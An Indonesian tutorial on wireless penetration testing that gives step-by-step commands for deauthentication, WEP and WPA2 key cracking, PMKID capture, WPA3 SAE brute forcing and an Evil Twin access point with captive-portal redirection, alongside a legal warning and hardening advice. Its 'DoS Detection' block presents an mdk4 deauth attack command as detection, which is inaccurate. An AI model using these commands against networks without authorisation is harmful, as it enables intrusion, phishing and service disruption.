Ketik untuk mencari
Beranda/Keamanan/Wireless Penetration Testing
Keamanan

Wireless Penetration Testing

Panduan lengkap wireless penetration testing — reconnaissance, WiFi cracking, Evil Twin, rogue AP, hingga wireless IDS

📅 29 Juni 2026📖 16 menit bacaLanjut
📋 Daftar Isi
  1. Pengenalan
  2. Tools & Setup
  3. Reconnaissance
  4. WEP Cracking
  5. WPA/WPA2 Cracking
  6. WPA3 Security
  7. Evil Twin
  8. Defense & Hardening
  9. Quiz

1. Pengenalan Wireless Penetration Testing

Wireless Penetration Testing adalah proses evaluasi keamanan jaringan nirkabel untuk mengidentifikasi kerentanan, konfigurasi yang salah, dan potensi eksploitasi. Berbeda dengan wired network, wireless network dapat diakses dari jarak tertentu tanpa koneksi fisik.

📋 Apa yang Dipelajari
  • Wireless security protocols (WEP, WPA, WPA2, WPA3)
  • WiFi reconnaissance dan scanning
  • Password cracking techniques
  • Evil Twin dan rogue AP attacks
  • Wireless IDS/IPS deployment
  • Remediation dan hardening

Wireless Security Protocol Evolution

ProtocolYearEncryptionStatus
WEP1999RC4 (24-bit IV)Broken — Jangan digunakan
WPA2003TKIP/RC4Deprecated
WPA22004AES-CCMPStandar saat ini
WPA32018SAE/AES-GCMPRekomendasi
⚠️ Peringatan Hukum

Wireless penetration testing HANYA boleh dilakukan pada jaringan yang Anda miliki atau memiliki izin tertulis. Mengakses jaringan tanpa izin adalah pelanggaran UU ITE Pasal 30-32.

2. Tools dan Setup

Untuk wireless pentest, Anda memerlukan hardware dan software yang sesuai. Wireless adapter harus mendukung monitor mode dan packet injection.

Hardware Requirements

Bash — Install Wireless Tools
# =============================================
# Installasi Tools Wireless Pentesting
# =============================================

# Update system
sudo apt update && sudo apt upgrade -y

# Install Aircrack-ng suite
sudo apt install -y aircrack-ng

# Install additional tools
sudo apt install -y \
  hostapd dnsmasq reaver wifite bully \
  pixiewps mdk3 mdk4 hashcat \
  hcxdumptool hcxpcapngtool \
  kismet wireshark

# Verifikasi wireless adapter
iwconfig

# Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Verifikasi monitor mode
iwconfig wlan0mon

# Cek adapter capabilities
iw list | grep -A 8 "Supported interface modes"

3. Wireless Reconnaissance

Reconnaissance adalah langkah pertama. Tujuannya mengidentifikasi semua wireless network, clients, dan konfigurasi dalam range.

Bash — WiFi Reconnaissance
# =============================================
# Wireless Reconnaissance dengan Aircrack-ng
# =============================================

# 1. Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# 2. Scan semua channel (passive)
sudo airodump-ng wlan0mon \
  --band abg \
  --write scan_results \
  --output-format pcap,csv

# 3. Focus pada target network
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 6 \
  --write target_capture \
  --output-format pcap,csv

# 4. Capture handshake (dengan deauth)
sudo aireplay-ng --deauth 10 \
  -a AA:BB:CC:DD:EE:FF \
  -c 11:22:33:44:55:66 \
  wlan0mon

# 5. Verifikasi handshake capture
aircrack-ng target_capture-01.cap

# =============================================
# Alternative: Kismet passive scanning
# =============================================

# Start Kismet server
sudo kismet -c wlan0mon --override wardrive

# Kismet mendeteksi:
# - SSID dan BSSID
# - Channel dan encryption
# - Client devices
# - Hidden SSIDs
# - Rogue access points

Client Enumeration

Bash — Client Discovery
# =============================================
# Client Enumeration & Analysis
# =============================================

# List all clients associated with AP
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 6 \
  --station-only

# Probe request analysis (what networks clients look for)
# Ini mengungkap SSID yang pernah dikunjungi client
sudo tcpdump -i wlan0mon -e -s 256 \
  'type mgt subtype probe-req' 2>/dev/null

# Detect hidden SSIDs through probe responses
sudo tcpdump -i wlan0mon -e -s 256 \
  'type mgt subtype probe-resp' 2>/dev/null

4. WEP Cracking

WEP menggunakan enkripsi RC4 dengan IV 24-bit yang sangat lemah. Dapat dipecahkan dalam hitungan menit.

Bash — WEP Cracking
# =============================================
# WEP Cracking Steps
# =============================================

# Step 1: Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Capture IVs
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 11 \
  --write wep_capture \
  --output-format pcap

# Step 3: Generate traffic (ARP replay)
sudo aireplay-ng --arpreplay \
  -b AA:BB:CC:DD:EE:FF \
  -h YOUR_MAC \
  wlan0mon

# Step 4: Fake authentication
sudo aireplay-ng --fakeauth 30 \
  -a AA:BB:CC:DD:EE:FF \
  -h YOUR_MAC \
  wlan0mon

# Step 5: Crack setelah ~20,000+ IVs
sudo aircrack-ng wep_capture-01.cap
# Output: KEY FOUND! [ 1A:2B:3C:4D:5E ]

# Alternatif: Fragmentation attack
sudo aireplay-ng --fragment \
  -b AA:BB:CC:DD:EE:FF \
  -h YOUR_MAC \
  wlan0mon
💡 Catatan

WEP cracking membutuhkan minimal 20,000 IVs untuk 64-bit key dan 40,000 IVs untuk 128-bit key. Dengan ARP replay, ini bisa dicapai dalam 5-10 menit. Semua organisasi HARUS beralih ke WPA2/WPA3.

5. WPA/WPA2 Cracking

WPA2 menggunakan AES-CCMP yang secara kriptografis kuat. Namun WPA2-PSK rentan dictionary attack jika password lemah.

Bash — WPA2 Cracking
# =============================================
# WPA2-PSK Cracking
# =============================================

# Step 1: Monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Step 2: Capture handshake
sudo airodump-ng wlan0mon \
  --bssid AA:BB:CC:DD:EE:FF \
  --channel 6 \
  --write wpa_handshake

# Step 3: Force reconnect (deauth)
sudo aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF \
  wlan0mon

# Step 4: Verify handshake
aircrack-ng wpa_handshake-01.cap

# Step 5: Dictionary attack
aircrack-ng wpa_handshake-01.cap \
  -w /usr/share/wordlists/rockyou.txt \
  -b AA:BB:CC:DD:EE:FF

# =============================================
# Hashcat (GPU accelerated)
# =============================================

# Convert to hashcat format
hcxpcapngtool wpa_handshake-01.cap \
  -o wpa_hash.hc22000

# GPU brute force
hashcat -m 22000 wpa_hash.hc22000 \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Mask attack (8 char lowercase + digits)
hashcat -m 22000 wpa_hash.hc22000 \
  -a 3 ?l?l?l?l?l?l?d?d

# =============================================
# PMKID Attack (tanpa client/deauth)
# =============================================

sudo hcxdumptool -i wlan0mon \
  --filterlist_ap=target.txt \
  --filtermode=2 \
  -o pmkid_capture.pcapng

hcxpcapngtool pmkid_capture.pcapng \
  -o pmkid_hash.hc22000
hashcat -m 22000 pmkid_hash.hc22000 \
  /usr/share/wordlists/rockyou.txt

6. WPA3 Security

WPA3 memperkenalkan SAE (Simultaneous Authentication of Equals) yang menggantikan PSK, memberikan perlindungan terhadap offline dictionary attack dan forward secrecy.

WPA3 Improvements

Bash — WPA3/SAE Testing
# =============================================
# WPA3 Dragonblood Attacks (Research)
# =============================================

# Note: Untuk research dan testing saja

# Install wacker (SAE brute force)
git clone https://github.com/blunderbuss-wctf/wacker
cd wacker
pip3 install -r requirements.txt

# Run SAE brute force
sudo python3 wacker.py \
  --wordlist wordlist.txt \
  --ssid "TargetWiFi" \
  --bssid AA:BB:CC:DD:EE:FF \
  --interface wlan0mon

# Dragonblood vulnerabilities:
# CVE-2019-9494 — SAE cache-based side-channel
# CVE-2019-9495 — EAP-pwd side-channel
# CVE-2020-15862 — Transition Disable Attack

# Defense against downgrade:
# - Enable Protected Management Frames (802.11w)
# - Disable WPA2/TKIP transition mode
# - Monitor for deauth attacks
# - Use WPA3-only mode if possible

7. Evil Twin & Karma Attack

Evil Twin adalah serangan di mana attacker membuat AP palsu yang meniru SSID target. Korban terhubung, attacker bisa MITM, credential harvesting, dan captive portal phishing.

Bash — Evil Twin Attack
# =============================================
# Evil Twin Access Point Setup
# =============================================

# Step 1: hostapd configuration
cat > hostapd_evil.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=FreeWiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=0
EOF

# Step 2: DHCP configuration (dnsmasq)
cat > dnsmasq_evil.conf << 'EOF'
interface=wlan1
dhcp-range=192.168.100.10,192.168.100.50,12h
dhcp-option=3,192.168.100.1
dhcp-option=6,192.168.100.1
server=8.8.8.8
log-queries
log-dhcp
EOF

# Step 3: Setup IP and routing
sudo ifconfig wlan1 192.168.100.1 netmask 255.255.255.0
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

# Step 4: Start services
sudo hostapd hostapd_evil.conf &
sudo dnsmasq -C dnsmasq_evil.conf &

# Step 5: Deauth clients dari AP asli
sudo aireplay-ng --deauth 0 \
  -a AA:BB:CC:DD:EE:FF \
  wlan0mon

# Step 6: Captive portal redirect
sudo iptables -t nat -A PREROUTING \
  -i wlan1 -p tcp --dport 80 \
  -j DNAT --to-destination 192.168.100.1:80

8. Defense & Hardening

Common Findings & Remediation

FindingSeverityRemediation
WEP encryptionCriticalMigrasi ke WPA3/WPA2-AES
WPA2 password lemahHighPassword 12+ karakter kompleks
Rogue AP terdeteksiHighLokasi dan hapus, implementasi WIDS
Open networkMediumTambah WPA2-Enterprise + 802.1X
Tanpa PMFMediumEnable PMF (802.11w)
SSID hiddenLowTidak efektif, fokus enkripsi kuat

Wireless Hardening Checklist

Config — WiFi Hardening
# =============================================
# Wireless Network Hardening Guide
# =============================================

# 1. Encryption
#    - Gunakan WPA3-SAE atau WPA2-AES (CCMP)
#    - Jangan gunakan WEP atau WPA-TKIP
#    - Password minimal 12 karakter, kompleks

# 2. Authentication
#    - Enterprise: WPA2/WPA3-Enterprise + RADIUS
#    - 802.1X certificate-based auth
#    - EAP-TLS untuk mutual authentication

# 3. Network Segmentation
#    - Guest network terpisah dari corporate
#    - VLAN untuk wireless clients
#    - Firewall rules antara VLAN

# 4. Management Frame Protection
#    - Enable 802.11w (PMF) - required
#    - Protect against deauth/disassoc attacks

# 5. Monitoring
#    - Deploy WIDS/WIPS
#    - Monitor rogue AP detection
#    - Alert on evil twin indicators
#    - Regular site surveys

# 6. Access Control
#    - MAC filtering (bukan satu-satunya kontrol)
#    - RADIUS accounting
#    - Time-based access policies

WPA2 Handshake Analysis

Memahami proses 4-way handshake WPA2 sangat penting untuk wireless security testing. Handshake terjadi saat client terhubung ke access point dan menukar cryptographic keys.

Diagram: WPA2 4-Way Handshake
┌─────────────────────────────────────────────────────┐
│           WPA2 4-WAY HANDSHAKE                       │
│                                                      │
│  Client (Supplicant)        AP (Authenticator)       │
│       │                          │                   │
│       │    1. ANonce             │                   │
│       │ ◄────────────────────────│                   │
│       │                          │                   │
│       │  [Derive PTK from        │                   │
│       │   ANonce + SNonce +      │                   │
│       │   PMK + MAC addresses]   │                   │
│       │                          │                   │
│       │    2. SNonce + MIC       │                   │
│       │ ────────────────────────►│                   │
│       │                          │                   │
│       │  [AP derives PTK,        │                   │
│       │   verifies MIC]          │                   │
│       │                          │                   │
│       │    3. GTK + MIC          │                   │
│       │ ◄────────────────────────│                   │
│       │                          │                   │
│       │    4. ACK                │                   │
│       │ ────────────────────────►│                   │
│       │                          │                   │
│  [Both sides now have PTK        │                   │
│   for encrypted communication]   │                   │
└─────────────────────────────────────────────────────┘

WiFi Jamming dan DoS

Serangan denial of service pada wireless network dapat dilakukan dengan mengirimkan deauthentication frames secara massal, menyebabkan semua client terputus dari access point.

Bash — WiFi DoS Detection
# =============================================
# WiFi DoS Attack Detection & Monitoring
# =============================================

# Monitor deauth flood attacks
sudo airodump-ng wlan0mon --output-format pcap \
  --write deauth_monitor

# Detect using mdk4
sudo mdk4 wlan0mon d -c 6

# Monitor with Wireshark filter
# wlan.fc.type_subtype == 0x000c
# (Deauthentication frames)

# Counter-measures:
# 1. Enable 802.11w (Protected Management Frames)
# 2. Deploy WIDS to detect deauth floods
# 3. Use frequency hopping if supported
# 4. Monitor signal strength anomalies

# Script: Automated deauth detection
#!/bin/bash
THRESHOLD=50
INTERFACE="wlan0mon"

while true; do
    DEAUTH_COUNT=$(tcpdump -i $INTERFACE -c 1000 \
      'type mgt subtype deauth' 2>/dev/null | wc -l)
    if [ "$DEAUTH_COUNT" -gt "$THRESHOLD" ]; then
        echo "[ALERT] Deauth flood detected: $DEAUTH_COUNT frames"
        # Send alert to SIEM
        logger -p auth.alert "WiFi deauth flood detected"
    fi
    sleep 10
done

9. Quiz Pemahaman

1. Apa kepanjangan SAE dalam WPA3?

2. Tool untuk menangkap 4-way handshake WPA2?

3. Minimum IVs untuk crack WEP 64-bit?

4. Apa itu Evil Twin attack?

5. Mode untuk packet sniffing pada wireless adapter?

Rangkuman

📝 Poin Penting
  • WEP — Sudah rusak, harus segera diganti ke WPA2/WPA3
  • WPA2-PSK — Rentan dictionary attack jika password lemah
  • WPA3 — SAE mencegah offline dictionary attack
  • Evil Twin — AP palsu sangat berbahaya, perlu WIDS
  • Legal — Selalu miliki izin tertulis sebelum testing